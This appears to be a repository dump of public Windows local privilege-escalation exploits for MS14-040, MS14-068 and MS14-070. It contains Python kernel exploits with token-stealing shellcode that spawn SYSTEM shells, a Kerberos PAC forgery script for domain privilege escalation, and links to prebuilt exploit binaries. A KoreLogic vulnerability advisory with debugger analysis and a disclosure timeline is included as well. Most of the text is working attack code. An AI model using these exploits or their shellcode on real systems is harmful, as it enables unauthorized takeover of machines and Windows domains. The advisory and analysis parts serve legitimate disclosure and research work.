sizeof(addr)) 194 | 195 | print "[+] sock connected." 196 | print "[+] fill kernel heap" 197 | 198 | rgnarr = [] 199 | nBottomRect = 0x02aaaaaa 200 | while(1): 201 | hrgn = windll.gdi32.CreateRoundRectRgn(0,0,1,nBottomRect,1,1) 202 | 203 | if hrgn == 0: 204 | break 205 | rgnarr.append(hrgn) 206 | print ".", 207 | 208 | 209 | print "\n[+] GO!" 210 | HalDispatchTable = get_haldispatchtable() 211 | print "[+] HalDispatchTable address:", hex(HalDispatchTable) 212 | # Win7 - x64 213 | (halbase, dllname) = find_driver_base("hal.dll") 214 | OS = "7" 215 | if OS == "7": 216 | HaliQuerySystemInformation = halbase+0x398e8 # Offset for win7 x64 217 | _KPROCESS = "\x70" 218 | _TOKEN = "\x08\x02" 219 | _UPID = "\x80\x01" 220 | _APLINKS = "\x88\x01" 221 | 222 | print "[+] HaliQuerySystemInformation:", hex(HaliQuerySystemInformation) 223 | 224 | IoStatus = c_ulonglong() 225 | IoStatusBlock = c_ulonglong() 226 | 227 | addrSetInfoWorkerFactory = 0x2218 228 | firstWriteAddr = HalDispatchTable + 0x8 - 0x2C 229 | secondWriteAddr = firstWriteAddr + 0x4 230 | thirdWriteAddr = firstWriteAddr + 0x1 231 | 232 | shellcode_address = c_ulonglong 233 | shellcode_address = 0x0000000000002500 234 | what_address = 0x0000250800002500 235 | what_part1 = what_address & 0xfffffff 236 | what_part2 = what_address >> 32 & 0xfffffff 237 | 238 | inbuf1 = 0x1000 239 | inbuf2 = 0x2000 240 | hWF = c_ulonglong(0) 241 | FakeWorkerFactoryADDR = 0x2100 242 | 243 | CreateBuffer1(inbuf1) 244 | CreateBuffer2(inbuf2) 245 | CreateFakeObject(firstWriteAddr, FakeWorkerFactoryADDR, addrSetInfoWorkerFactory) 246 | print "" 247 | print "" 248 | print "[*] Trigger IOCTL 0x1207f (afdTransmitFile) to setup the memory " 249 | print "[*] structures for phase 2 and fil the freed space with a " 250 | print "[*] WorkerFactory Object" 251 | raw_input("[+] Press Enter to trigger phase 1") 252 | ntdll.ZwDeviceIoControlFile.argtypes = [c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, POINTER(c_ulonglong), 253 | c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong] 254 | status = ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x1207f, inbuf1, 0x40, 0x0, 0x0) 255 | 256 | 257 | kernel32.CreateIoCompletionPort.argtypes = [c_ulonglong,c_ulonglong,c_ulonglong,c_ulonglong] 258 | CompletionPort = HANDLE(kernel32.CreateIoCompletionPort( INVALID_HANDLE_VALUE, 0, 0, 0)) 259 | 260 | ntdll.ZwCreateWorkerFactory.argtypes = [POINTER(c_ulonglong), c_ulonglong, c_ulonglong, c_void_p, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong] 261 | ntdll.ZwCreateWorkerFactory(byref(hWF),GENERIC_ALL,0,CompletionPort,INVALID_HANDLE_VALUE,0,0,0,0,0) 262 | hWFaddr = hWF 263 | 264 | 265 | padding = "\x90"*8 266 | HalDispatchTable0x8 = HalDispatchTable + 0x8 267 | 268 | sc_pointer = struct.pack("Q", shellcode_address+0x10) 269 | sc_pointer += struct.pack("Q", 0x25) 270 | 271 | restore_ptrs = "\x41\x51" +\ 272 | "\x41\x52" +\ 273 | "\x41\x53" +\ 274 | "\x49\xb9" + struct.pack("Q", HaliQuerySystemInformation) +\ 275 | "\x49\xba" + struct.pack("Q", HalDispatchTable0x8) +\ 276 | "\x4d\x89\x0a" 277 | 278 | tokenstealing = "\x65\x4C\x8B\x0C\x25\x88\x01\x00\x00" +\ 279 | "\x4D\x8B\x89" + _KPROCESS + "\x00\x00\x00" +\ 280 | "\x4D\x89\xCA" +\ 281 | "\x4D\x8B\x89" + _APLINKS + "\x00\x00" +\ 282 | "\x49\x81\xE9" + _APLINKS + "\x00\x00" +\ 283 | "\x49\x83\xB9" + _UPID + "\x00\x00\x04" +\ 284 | "\x75\xe8" +\ 285 | "\x4D\x8B\x89" + _TOKEN + "\x00\x00" +\ 286 | "\x4D\x89\x8A" + _TOKEN + "\x00\x00" 287 | 288 | fixobjheaders = "\x4d\x8b\x92\x00\x02\x00\x00" +\ 289 | "\x4d\x89\xd1" +\ 290 | "\x4d\x8b\x12" +\ 291 | "\x41\xbb" + struct.pack("L", hWF.value)+\ 292 | "\x41\x83\xe3\xfc" +\ 293 | "\x4d\x01\xdb" +\ 294 | "\x4d\x01\xdb" +\ 295 | "\x4d\x01\xda" +\ 296 | "\x49\xc7\x02\x00\x00\x00\x00" +\ 297 | "\x49\x83\xc1\x58" +\ 298 | "\x4d\x89\xca" +\ 299 | "\x4d\x8b\x09" +\ 300 | "\x49\x83\xe9\x01" +\ 301 | "\x4d\x89\x0a" +\ 302 | "\x41\x5b" +\ 303 | "\x41\x5A" +\ 304 | "\x41\x59" +\ 305 | "\xc3" 306 | 307 | shellcode = sc_pointer + padding + restore_ptrs + tokenstealing + fixobjheaders 308 | shellcode_size = len(shellcode) 309 | 310 | print "\n\n[+] Writing Shellcode at address: ", hex(shellcode_address) 311 | 312 | kernel32.WriteProcessMemory(-1, shellcode_address, shellcode, shellcode_size, byref(written)) 313 | 314 | print "\n\n[*] Triggering IOCTL 0x120c3 (afdTransmitPackets) to free the" 315 | print "[*] WorkerFactory object created above and fill the freed object" 316 | print "[*] with a user controlled object to perform the necessary overwrites" 317 | raw_input("[+] Press Enter to trigger phase 2") 318 | 319 | ### Trigger 2 320 | ## afd!AfdTransmitPackets 321 | ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x120c3, inbuf2, 0x18, 0x0, 0x0) 322 | 323 | ntdll.ZwQueryEaFile(INVALID_HANDLE_VALUE, byref(IoStatus), None, 0, False, FakeWorkerFactoryADDR, FakeObjSize-0x04, None, False) 324 | ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part1, 0x4) 325 | kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", secondWriteAddr), 0x8, byref(written)) 326 | ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4) 327 | kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", thirdWriteAddr), 0x8, byref(written)) 328 | ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4) ; 329 | 330 | inp = c_long() 331 | out = c_long() 332 | inp = 0x1337 333 | qip = ntdll.NtQueryIntervalProfile(inp, byref(out)) 334 | print "[*] Spawning a SYSTEM shell..." 335 | os.system("cmd.exe /K cd c:\\windows\\system32") 336 | 337 | 338 | if __name__ == "__main__": 339 | if platform.architecture()[0] == '64bit': 340 | main() 341 | else: 342 | print "Please use a 64 bit version of python" 343 | sys.exit() 344 | 345 | 346 | 347 | -------------------------------------------------------------------------------- /MS14-040/MS14-040.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS14-040/MS14-040.exe -------------------------------------------------------------------------------- /MS14-058/39666.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS14-058/39666.zip -------------------------------------------------------------------------------- /MS14-058/MS14-058.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS14-058/MS14-058.exe -------------------------------------------------------------------------------- /MS14-068/35474.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # MS14-068 Exploit 4 | 5 | # Author 6 | # ------ 7 | # Sylvain Monne 8 | # Contact : sylvain dot monne at solucom dot fr 9 | # http://twitter.com/bidord 10 | 11 | 12 | 13 | import sys, os 14 | from random import getrandbits 15 | from time import time, localtime, strftime 16 | 17 | from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache 18 | from kek.crypto import generate_subkey, ntlm_hash, RC4_HMAC, HMAC_MD5 19 | from kek.krb5 import build_as_req, build_tgs_req, send_req, recv_rep, \ 20 | decrypt_as_rep, decrypt_tgs_rep, decrypt_ticket_enc_part, iter_authorization_data, \ 21 | AD_WIN2K_PAC 22 | from kek.pac import build_pac, pretty_print_pac 23 | from kek.util import epoch2gt, gt2epoch 24 | 25 | 26 | def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, 27 | output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None): 28 | 29 | sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a) 30 | sys.stderr.flush() 31 | nonce = getrandbits(31) 32 | current_time = time() 33 | as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False) 34 | sys.stderr.write(' Done!\n') 35 | 36 | sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a) 37 | sys.stderr.flush() 38 | sock = send_req(as_req, kdc_a) 39 | sys.stderr.write(' Done!\n') 40 | 41 | sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a) 42 | sys.stderr.flush() 43 | data = recv_rep(sock) 44 | sys.stderr.write(' Done!\n') 45 | 46 | sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a) 47 | sys.stderr.flush() 48 | as_rep, as_rep_enc = decrypt_as_rep(data, user_key) 49 | session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue'])) 50 | logon_time = gt2epoch(str(as_rep_enc['authtime'])) 51 | tgt_a = as_rep['ticket'] 52 | sys.stderr.write(' Done!\n') 53 | 54 | 55 | if krbtgt_a_key is not None: 56 | print >> sys.sdterr, as_rep.prettyPrint() 57 | print >> sys.stderr, as_rep_enc.prettyPrint() 58 | ticket_debug(tgt_a, krbtgt_a_key) 59 | 60 | sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a) 61 | sys.stderr.flush() 62 | subkey = generate_subkey() 63 | nonce = getrandbits(31) 64 | current_time = time() 65 | pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time)) 66 | tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name, 67 | tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False) 68 | sys.stderr.write(' Done!\n') 69 | 70 | sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a) 71 | sys.stderr.flush() 72 | sock = send_req(tgs_req, kdc_a) 73 | sys.stderr.write(' Done!\n') 74 | 75 | sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a) 76 | sys.stderr.flush() 77 | data = recv_rep(sock) 78 | sys.stderr.write(' Done!\n') 79 | 80 | sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a) 81 | tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey) 82 | session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue'])) 83 | tgt_b = tgs_rep['ticket'] 84 | sys.stderr.write(' Done!\n') 85 | 86 | 87 | if trust_ab_key is not None: 88 | pretty_print_pac(pac[1]) 89 | print >> sys.stderr, tgs_rep.prettyPrint() 90 | print >> sys.stderr, tgs_rep_enc.prettyPrint() 91 | ticket_debug(tgt_b, trust_ab_key) 92 | 93 | 94 | if target_service is not None and target_host is not None and kdc_b is not None: 95 | sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b) 96 | sys.stderr.flush() 97 | subkey = generate_subkey() 98 | nonce = getrandbits(31) 99 | current_time = time() 100 | tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name, 101 | tgt_b, session_key2, subkey, nonce, current_time) 102 | sys.stderr.write(' Done!\n') 103 | 104 | sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b) 105 | sys.stderr.flush() 106 | sock = send_req(tgs_req2, kdc_b) 107 | sys.stderr.write(' Done!\n') 108 | 109 | sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b) 110 | sys.stderr.flush() 111 | data = recv_rep(sock) 112 | sys.stderr.write(' Done!\n') 113 | 114 | sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b) 115 | tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey) 116 | sys.stderr.write(' Done!\n') 117 | 118 | else: 119 | tgs_rep2 = tgs_rep 120 | tgs_rep_enc2 = tgs_rep_enc 121 | 122 | sys.stderr.write(' [+] Creating ccache file %r...' % output_filename) 123 | cc = CCache((user_realm, user_name)) 124 | tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2) 125 | cc.add_credential(tgs_cred) 126 | cc.save(output_filename) 127 | sys.stderr.write(' Done!\n') 128 | 129 | 130 | if target_key is not None: 131 | print >> sys.stderr, tgs_rep2.prettyPrint() 132 | print >> sys.stderr, tgs_rep_enc2.prettyPrint() 133 | ticket_debug(tgs_rep2['ticket'], target_key) 134 | 135 | 136 | # Pretty print full ticket content 137 | # Only possible in a lab environment when you already know krbtgt and/or service keys 138 | def ticket_debug(ticket, key): 139 | try: 140 | ticket_enc = decrypt_ticket_enc_part(ticket, key) 141 | print >> sys.stderr, ticket.prettyPrint() 142 | for ad in iter_authorization_data(ticket_enc['authorization-data']): 143 | print >> sys.stderr, 'AUTHORIZATION-DATA (type: %d):' % ad['ad-type'] 144 | if ad['ad-type'] == AD_WIN2K_PAC: 145 | pretty_print_pac(str(ad['ad-data'])) 146 | else: 147 | print >> sys.stderr, str(ad['ad-data']).encode('hex') 148 | except Exception as e: 149 | print 'ERROR:', e 150 | 151 | 152 | if __name__ == '__main__': 153 | from getopt import getopt 154 | from getpass import getpass 155 | 156 | def usage_and_exit(): 157 | print >> sys.stderr, 'USAGE:' 158 | print >> sys.stderr, '%s -u @ -s -d ' % sys.argv[0] 159 | print >> sys.stderr, '' 160 | print >> sys.stderr, 'OPTIONS:' 161 | print >> sys.stderr, ' -p ' 162 | print >> sys.stderr, ' --rc4 ' 163 | sys.exit(1) 164 | 165 | opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4=']) 166 | opts = dict(opts) 167 | if not all(k in opts for k in ('-u', '-s', '-d')): 168 | usage_and_exit() 169 | 170 | user_name, user_realm = opts['-u'].split('@', 1) 171 | user_sid = opts['-s'] 172 | kdc_a = opts['-d'] 173 | 174 | if '--rc4' in opts: 175 | user_key = (RC4_HMAC, opts['--rc4'].decode('hex')) 176 | assert len(user_key[1]) == 16 177 | elif '-p' in opts: 178 | user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest()) 179 | else: 180 | user_key = (RC4_HMAC, ntlm_hash(getpass('Password: ')).digest()) 181 | 182 | target_realm = user_realm 183 | target_service = target_host = kdc_b = None 184 | filename = 'TGT_%s@%s.ccache' % (user_name, user_realm) 185 | 186 | user_realm = user_realm.upper() 187 | target_realm = target_realm.upper() 188 | 189 | sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename) -------------------------------------------------------------------------------- /MS14-068/MS14-068.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS14-068/MS14-068.exe -------------------------------------------------------------------------------- /MS14-070/35936.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS14-070/35936.exe -------------------------------------------------------------------------------- /MS14-070/35936.py: -------------------------------------------------------------------------------- 1 | """ 2 | KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation 3 | 4 | Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation 5 | Advisory ID: KL-001-2015-001 6 | Publication Date: 2015.01.28 7 | Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt 8 | 9 | 1. Vulnerability Details 10 | 11 | Affected Vendor: Microsoft 12 | Affected Product: TCP/IP Protocol Driver 13 | Affected Version: 5.2.3790.4573 14 | Platform: Microsoft Windows Server 2003 Service Pack 2 15 | Architecture: x86, x64, Itanium 16 | Impact: Privilege Escalation 17 | Attack vector: IOCTL 18 | CVE-ID: CVE-2014-4076 19 | 20 | 2. Vulnerability Description 21 | 22 | The tcpip.sys driver fails to sufficiently validate memory 23 | objects used during the processing of a user-provided IOCTL. 24 | 25 | 3. Technical Description 26 | 27 | By crafting an input buffer that will be passed to the Tcp 28 | device through the NtDeviceIoControlFile() function, it 29 | is possible to trigger a vulnerability that would allow an 30 | attacker to elevate privileges. 31 | 32 | This vulnerability was discovered while fuzzing the tcpip.sys 33 | driver. A collection of IOCTLs that could be targeted was 34 | obtained and subsequently fuzzed. During this process, one of 35 | the crashes obtained originated from the IOCTL 0x00120028. 36 | This was performed on an x86 installation of Windows Server 37 | 2003, Service Pack 2. 38 | 39 | ErrCode = 00000000 40 | eax=00000000 ebx=859ef888 ecx=00000008 edx=00000100 esi=00000000 edi=80a58270 41 | eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0 nv up ei pl zr na pe nc 42 | cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 43 | tcpip!SetAddrOptions+0x1d: 44 | f67ebbbd 8b5e28 mov ebx,dword ptr [esi+28h] ds:0023:00000028=???????? 45 | 46 | A second chance exception has occurred during a mov 47 | instruction. This instruction is attempting to copy a pointer 48 | value from an un-allocated address space. Since no pointer 49 | can be found, an exception is generated. 50 | 51 | Let's begin by reviewing the call stack: 52 | 53 | kd> kv 54 | *** Stack trace for last set context - .thread/.cxr resets it 55 | ChildEBP RetAddr Args to Child 56 | f620a9dc f67e416b f620aa34 00000022 00000004 tcpip!SetAddrOptions+0x1d (FPO: [Non-Fpo]) 57 | f620aa10 f67e40de f620aa34 859ef888 859ef8a0 tcpip!TdiSetInformationEx+0x539 (FPO: [Non-Fpo]) 58 | f620aa44 f67e3b24 85a733d0 85a73440 85a73440 tcpip!TCPSetInformationEx+0x8c (FPO: [Non-Fpo]) 59 | f620aa60 f67e3b51 85a733d0 85a73440 85a733d0 tcpip!TCPDispatchDeviceControl+0x149 (FPO: [Non-Fpo]) 60 | f620aa98 8081d7d3 85c4b410 85a733d0 85e82390 tcpip!TCPDispatch+0xf9 (FPO: [Non-Fpo]) 61 | f620aaac 808ef85d 85a73440 85e82390 85a733d0 nt!IofCallDriver+0x45 (FPO: [Non-Fpo]) 62 | f620aac0 808f05ff 85c4b410 85a733d0 85e82390 nt!IopSynchronousServiceTail+0x10b (FPO: [Non-Fpo]) 63 | f620ab5c 808e912e 000006f4 00000000 00000000 nt!IopXxxControlFile+0x5e5 (FPO: [Non-Fpo]) 64 | f620ab90 f55c10fa 000006f4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a (FPO: [Non-Fpo]) 65 | 66 | The nt!NtDeviceIoControlFile() function was called, creating 67 | a chain of subsequent function calls that eventually led to 68 | the tcpip!SetAddrOptions() function being called. 69 | 70 | By de-constructing the call to nt!NtDeviceIoControlFile() we 71 | can derive all required information to re-create this exception. 72 | 73 | 0a b940dd34 80885614 nt!NtDeviceIoControlFile+0x2a 74 | eax=00000000 ebx=8c785070 ecx=00000000 edx=00000000 esi=00000000 edi=00000000 75 | eip=808e912e esp=b940dd08 ebp=b940dd34 iopl=0 nv up ei pl zr na pe nc 76 | cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 77 | nt!NtDeviceIoControlFile+0x2a: 78 | 808e912e 5d pop ebp 79 | kd> db [ebp+2C] L?0x4 80 | b940dd60 00 00 00 00 .... 81 | kd> db [ebp+28] L?0x4 82 | b940dd5c 00 00 00 00 .... 83 | kd> db [ebp+24] L?0x4 84 | b940dd58 20 00 00 00 ... 85 | kd> db [ebp+20] L?0x4 86 | b940dd54 00 11 00 00 .... 87 | kd> db [ebp+1c] L?0x4 88 | b940dd50 28 00 12 00 (... 89 | kd> db [ebp+18] L?0x4 90 | b940dd4c 58 4f bd 00 XO.. 91 | kd> db [ebp+14] L?0x4 92 | b940dd48 00 00 00 00 .... 93 | kd> db [ebp+10] L?0x4 94 | b940dd44 00 00 00 00 .... 95 | kd> db [ebp+0c] L?0x4 96 | b940dd40 00 00 00 00 .... 97 | kd> db [ebp+8] L?0x4 98 | b940dd3c b8 06 00 00 .... 99 | 100 | The inputBuffer for this call references memory at 0x1000 with 101 | a length of 0x20. 102 | 103 | kd> db 0x1100 L?0x20 104 | 00001100 00 04 00 00 00 00 00 00-00 02 00 00 00 02 00 00 ................ 105 | 00001110 22 00 00 00 04 00 00 00-00 00 01 00 00 00 00 00 "............... 106 | 107 | After review of the tcpip.sys driver, some memory trickery 108 | was created to control the code flow until the instruction 109 | pointer could be controlled in a way that would be beneficial 110 | to an attacker. 111 | 112 | kd> db 0x28 L?0x11 113 | 00000028 87 ff ff 38 00 00 00 00-00 00 00 00 00 00 00 00 ...8............ 114 | 00000038 01 115 | 116 | eax=00000000 ebx=80a58290 ecx=00000000 edx=00000000 esi=00000000 edi=00000000 117 | eip=0000002a esp=b940db3c ebp=b940db60 iopl=0 nv up ei pl zr na pe nc 118 | cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 119 | 0000002a ff ??? 120 | 121 | Since the instruction pointer now contains 0x0000002a, 122 | exploitation becomes trivial. Merely allocating the desired 123 | payload for execution at this memory address will allow for 124 | unprivileged users to run their payload within a privileged 125 | process. 126 | 127 | 4. Mitigation and Remediation Recommendation 128 | 129 | The vendor has issued a patch for this 130 | vulnerability, the details of which are presented 131 | in the vendor's public acknowledgment MS14-070 132 | (https://technet.microsoft.com/library/security/MS14-070). 133 | 134 | 5. Credit 135 | 136 | This vulnerability was discovered by Matt Bergin of KoreLogic 137 | Security, Inc. 138 | 139 | 6. Disclosure Timeline 140 | 141 | 2014.04.28 - Initial contact; sent Microsoft report and PoC. 142 | 2014.04.28 - Microsoft requests PoC. 143 | 2014.04.29 - KoreLogic resends PoC from the initial contact 144 | email. 145 | 2014.04.29 - Microsoft acknowledges receipt of vulnerability 146 | report. 147 | 2014.04.29 - Microsoft opens case 19010 (MSRC 0050929) to 148 | investigate the vulnerability. 149 | 2014.04.30 - Microsoft informs KoreLogic that the case is 150 | actively being investigated. 151 | 2014.05.30 - Microsoft informs KoreLogic that the case is 152 | actively being investigated. 153 | 2014.06.11 - KoreLogic informs Microsoft that 30 business days 154 | have passed since vendor acknowledgment of the 155 | initial report. KoreLogic requests CVE number for 156 | the vulnerability, if there is one. KoreLogic 157 | also requests vendor's public identifier for the 158 | vulnerability along with the expected disclosure 159 | date. 160 | 2014.06.24 - KoreLogic informs Microsoft that no response was 161 | received following the 06.11.14 email. KoreLogic 162 | requests CVE number for the vulnerability, if 163 | there is one. KoreLogic also requests vendor's 164 | public identifier for the vulnerability along with 165 | the expected disclosure date. 166 | 2014.06.24 - Microsoft replies to KoreLogic that they have 167 | reproduced the vulnerability and are determining 168 | how to proceed with the supplied information. 169 | They are not able to provide a CVE or an expected 170 | disclosure date. 171 | 2014.07.02 - 45 business days have elapsed since Microsoft 172 | acknowledged receipt of the vulnerability report 173 | and PoC. 174 | 2014.07.17 - KoreLogic requests CVE number for the 175 | vulnerability. KoreLogic also requests vendor's 176 | public identifier for the vulnerability along with 177 | the expected disclosure date. 178 | 2014.08.18 - Microsoft notifies KoreLogic that they have a CVE 179 | but are not willing to share it with KoreLogic at 180 | this time. 181 | 2014.09.08 - KoreLogic requests CVE number for the 182 | vulnerability. KoreLogic also requests vendor's 183 | public identifier for the vulnerability along with 184 | the expected disclosure date. 185 | 2014.09.11 - Microsoft responds saying that the vulnerability 186 | is expected to be disclosed in "a Fall release" 187 | and that "it is currently looking good for 188 | October." Does not provide CVE. 189 | 2014.09.24 - Microsoft informs KoreLogic that there was a 190 | packaging issue and that the patch will be pushed 191 | to November. 192 | 2014.11.03 - Microsoft confirms the patch will ship in November. 193 | 2014.11.11 - Vulnerability publicly disclosed by Microsoft as 194 | issue MS14-070 with CVE-2014-4076. 195 | 2015.01.28 - KoreLogic releases advisory. 196 | 197 | 7. Exploit 198 | """ 199 | 200 | #!/usr/bin/python2 201 | # 202 | # KL-001-2015-001 / MS14-070 / CVE-2014-4076 203 | # Microsoft Windows Server 2003 x86 Tcpip.sys Privilege Escalation 204 | # Matt Bergin @ KoreLogic / Level @ Smash the Stack 205 | # shout out to bla 206 | # 207 | 208 | from optparse import OptionParser 209 | from subprocess import Popen 210 | from os.path import exists 211 | from struct import pack 212 | from time import sleep 213 | from ctypes import * 214 | from sys import exit 215 | 216 | CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory = 217 | windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory 218 | DeviceIoControlFile,CloseHandle = windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle 219 | INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 220 | 221 | def spawn_process(path): 222 | process = Popen([path],shell=True) 223 | pid = process.pid 224 | return 225 | 226 | def main(): 227 | print "CVE-2014-4076 x86 exploit, Level\n" 228 | global pid, process 229 | parser = OptionParser() 230 | parser.add_option("--path",dest="path",help="path of process to start and elevate") 231 | parser.add_option("--pid",dest="pid",help="pid of running process to elevate") 232 | o,a = parser.parse_args() 233 | if (o.path == None and o.pid == None): 234 | print "[!] no path or pid set" 235 | exit(1) 236 | else: 237 | if (o.path != None): 238 | if (exists(o.path) != True): 239 | print "[!] path does not exist" 240 | exit(1) 241 | else: 242 | Thread(target=spawn_process,args=(o.path),name='attacker-cmd').start() 243 | if (o.pid != None): 244 | try: 245 | pid = int(o.pid) 246 | except: 247 | print "[!] could not convert PID to an interger." 248 | exit(1) 249 | while True: 250 | if ("pid" not in globals()): 251 | sleep(1) 252 | else: 253 | print "[+] caught attacker cmd at %s, elevating now" % (pid) 254 | break 255 | buf = 256 | "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00" 257 | sc = 258 | "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00" 259 | sc = sc.replace("\x41\x41\x41\x41",pack(' 58 | #include 59 | #include 60 | #include 61 | 62 | 63 | 64 | 65 | typedef enum _SYSTEM_INFORMATION_CLASS { 66 | SystemBasicInformation = 0, 67 | SystemPerformanceInformation = 2, 68 | SystemTimeOfDayInformation = 3, 69 | SystemProcessInformation = 5, 70 | SystemProcessorPerformanceInformation = 8, 71 | SystemInterruptInformation = 23, 72 | SystemExceptionInformation = 33, 73 | SystemRegistryQuotaInformation = 37, 74 | SystemLookasideInformation = 45 75 | } SYSTEM_INFORMATION_CLASS; 76 | 77 | 78 | typedef DWORD NTSTATUS; 79 | NTSTATUS WINAPI NtQuerySystemInformation ( 80 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 81 | PVOID SystemInformation, 82 | ULONG SystemInformationLength, 83 | PULONG ReturnLength 84 | ); 85 | 86 | 87 | typedef struct _IO_STATUS_BLOCK { 88 | union { 89 | NTSTATUS Status; 90 | PVOID Pointer; 91 | }; 92 | ULONG_PTR Information; 93 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 94 | 95 | 96 | typedef void (WINAPI * PIO_APC_ROUTINE) (PVOID, PIO_STATUS_BLOCK, ULONG); 97 | 98 | 99 | NTSTATUS (WINAPI *ZwAllocateVirtualMemory) ( 100 | HANDLE ProcessHandle, 101 | PVOID *BaseAddress, 102 | ULONG_PTR ZeroBits, 103 | PSIZE_T RegionSize, 104 | ULONG AllocationType, 105 | ULONG Protect 106 | ); 107 | 108 | 109 | NTSTATUS (WINAPI *ZwDeviceIoControlFile) ( 110 | HANDLE FileHandle, 111 | PVOID ApcContext, 112 | PIO_STATUS_BLOCK IoStatusBlock, 113 | ULONG IoControlCode, 114 | PVOID InputBuffer, 115 | ULONG InputBufferLength, 116 | PVOID OutputBuffer, 117 | ULONG OutputBufferLength 118 | ); 119 | 120 | 121 | 122 | 123 | BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation) 124 | { 125 | ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO)); 126 | startupInformation->cb = sizeof (STARTUPINFO); 127 | ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION)); 128 | 129 | // Start the child process. 130 | return CreateProcess ( 131 | NULL, // No module name (use command line) 132 | "c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32", // Start cmd.exe 133 | NULL, // Process handle not inheritable 134 | NULL, // Thread handle not inheritable 135 | TRUE, // Set handle inheritance to TRUE 136 | 0, // No creation flags 137 | NULL, // Use parent's environment block 138 | NULL, // Use parent's starting directory 139 | &startupInformation[0], // Pointer to STARTUPINFO structure 140 | &processInformation[0] // Pointer to PROCESS_INFORMATION structure 141 | ); 142 